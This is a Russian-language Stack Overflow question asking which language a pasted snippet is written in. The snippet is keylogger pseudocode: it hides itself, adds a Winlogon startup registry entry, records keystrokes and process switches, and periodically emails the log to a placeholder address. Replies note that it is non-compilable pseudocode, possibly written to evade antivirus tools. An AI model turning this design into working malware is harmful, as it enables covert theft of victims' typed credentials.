# На каком языке программирования написан код?

Tags: веб-программирование, любой-язык

```
İnitialising
{
add(InOutOperation)
add(KeyCodeRegistry)
add(MailProtocol)
add(SystemProcesses)
add(SystemRegistry)
run_main()
}
list<Text_CurrentProcess> <Text_EnteredText> data;
event_onKeyPress
{
data[last]_Add(currentKeyCode_char)
} 
event_onProcessSwitch{
data_add(currentProcess_text)
}
event_tick{
logfile_log = create_logfile
log_write(data)
mailSender_m= create_mailSender
m_address= Text(example.email@gmail.com)
m_attachment_Add(log)
m_send
}
procedure_main()
{
app_hide
registryKey_reg= create_registryKey
reg= system_registry_winlogon_startup
reg_create(app_path)
system_registry_add(reg)

keyboardHook_onKeyPress = create_event(onKeyPress)
systemProcesses_onProcessSwitch = create_event(onProcessSwitch)
timer_t = create_timer
t_period = int(320000)
t_tick = create_event(tick)
procedure_end
}
```

Кто знает этот код на каком языке программирования?

Comment: Вы просто встретили кусок кода где-то? Или выдрали это из файла с каким-то расширением? Это похоже на какую-то библиотеку, и ощущение что это просто её инициализация(запуск с настройками).

Comment: Я в форуме увидел.Но какого языка/где компилировать ничего не было сказано

Comment: И да это не все я просто эту часть сюда копировал еще немного кодов осталось

Comment: А для чего этот код нужен? Какую задачу он призван решить? Добавьте остальную часть кода и пояснение к нему с форума

Comment: Кейлоггер кажется я щас добавлю все а форум найти не могу.

Comment: Я все скопировал. Форума найти не могу(код я скопировал в комп оттуда я сюда скоприовал если что)

Comment: Напомнило псевдокод типа как скрипты для CheatEnigne.

Comment: Но я ищу какой это код и где можно компилировать CheatEngine говорите?

Comment: похоже на питон со скобками)

Comment: Initialising это я на азербайджанском написал по этому. Нет это не питон попробовал я

Comment: Данный вопрос следует закрыть, потому что в текущем виде он бесполезен для остальных посетителей Stack Overflow кроме автора.

Answer (score 3):

Судя по синтаксису и назначению кода (кейлогер) это псевдокод, который специально был написан в таком ключе, чтобы затруднить эвристический анализ антивирусными системами. По общим моментам синтаксиса - скорее всего один из Си-подобных языков (очень много конструкций, которые повторяют аналогичные на Си, скорее всего псевдокод, написанный под влиянием C#/С++).

P.S. Судя по первой строчке (İnitialising) - возможно написан турецким/азербайджанским программистом (но не факт, может сделано намеренно).

Comment: Да вы правы я ошибочно написал İnitialising.Азербайджанское букво вместо I. Вы говорите это C#/C+?

Comment: P.S Я бы проголосовал ответ полезен репутация не разрешает

Comment: Я бы хотел задать такой вопрос я это написал в Visual studio и хотел компилировать и там куча ошибок. То ; пропущено то это т.д.Скажите как и где это тестировать

Comment: @MahmudShahmuradov это скорее предположение, много схожих конструкций

Comment: @MahmudShahmuradov `Вы говорите это C#/C+` — нет. Конструкция вида `data[last]_Add(currentKeyCode_char)` не скомпилируется, даже если наворотить `define`-ов. Причина — сразу же после закрывающейся квадратной скобки не может быть символов, встречающихся в именах переменных.

Comment: @Arhad как я писал выше - это псевдокод (который писался под влиянием C#/C+), а не обычный код написанный на C#/C+

Comment: @Arhad: Думаю, в коде вместо `.` используется `_`.

Comment: Я как то согласен с Dimitry Maslennikov как то похоже на С+/С# но где и как компилировать незнаю

Comment: @MahmudShahmuradov это неполный код. для компиляции скорее всего потребуется дополнительная библиотека (должна быть в том источнике, из которого получен код), которая переводит этот псевдокод в нормальный код для C#/C++

Comment: Блин вот дела найти не могу форум просто этот код просто интересным стал для меня очень всех блогадарю за труд!

Comment: @MahmudShahmuradov Почему не примете?